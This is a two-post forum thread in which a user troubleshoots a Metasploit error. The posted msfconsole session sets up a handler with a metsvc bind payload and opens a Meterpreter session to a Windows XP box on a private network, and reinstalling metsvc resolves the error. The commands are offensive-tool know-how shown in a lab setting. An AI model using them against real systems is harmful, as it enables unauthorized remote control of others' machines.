Results 1 to 2 of 2

Thread: Metasploit Error: Failed to load extension: The core_loadlib request failed

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    5

    Default Metasploit Error: Failed to load extension: The core_loadlib request failed

    Hallo,

    i have used metasploit today again an xp box with metsvc installed...
    many errors okured:

    ./msfconsole

    ____________
    < metasploit >
    ------------
    \ ,__,
    \ (oo)____
    (__) )\
    ||--|| *


    =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
    + -- --=[ 568 exploits - 285 auxiliary
    + -- --=[ 212 payloads - 27 encoders - 8 nops
    =[ svn r9911 updated today (2010.07.21)

    msf > use exploit/multi/handler
    msf exploit(handler) > set PAYLOAD windows/metsvc_
    set PAYLOAD windows/metsvc_bind_tcp set PAYLOAD windows/metsvc_reverse_tcp
    msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
    PAYLOAD => windows/metsvc_bind_tcp
    msf exploit(handler) > set LPORT 31337
    LPORT => 31337
    msf exploit(handler) > set RHOST 192.168.0.101
    RHOST => 192.168.0.101
    msf exploit(handler) > exploit
    [*] Starting the payload handler...[*] Started bind handler[*] Meterpreter session 1 opened (192.168.0.100:52442 -> 192.168.0.101:31337) at Thu Jul 22 12:22:26 +0200 2010
    [-] Failed to load extension: The core_loadlib request failed with result: 87.

    metsvc is running on an winxp sp3 box....

    every run command shows this error:

    Error in script: NoMethodError undefined method `' for nil:NilClass

    Google take no result...

    anny sugestions??

    Thanks and greatings

    vito

  2. #2
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    5

    Default Re: Metasploit Error: Failed to load extension: The core_loadlib request failed

    Hallo,

    uninstall metsvc on xp-box und new installation of this solved the problem..

    greatings

    vito

Similar Threads

  1. ioctl(SIOCSIFFLAGS) failed: Unknown error 132
    By wings in forum Beginners Forum
    Replies: 6
    Last Post: 10-18-2010, 10:32 PM
  2. zd1211rw firmware failed to load (-2)
    By Dr. Nick in forum Beginners Forum
    Replies: 2
    Last Post: 07-28-2010, 08:51 AM
  3. metasploit exploit failed: The address is already in use
    By mikehawk in forum OLD Newbie Area
    Replies: 1
    Last Post: 10-14-2009, 04:51 AM
  4. write failed error
    By EcKo in forum OLD Newbie Area
    Replies: 0
    Last Post: 01-20-2008, 08:14 PM
  5. failed to load module with msfconsole
    By imported_bulgin in forum OLD BackTrack v2.0 Final
    Replies: 0
    Last Post: 12-15-2007, 02:05 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •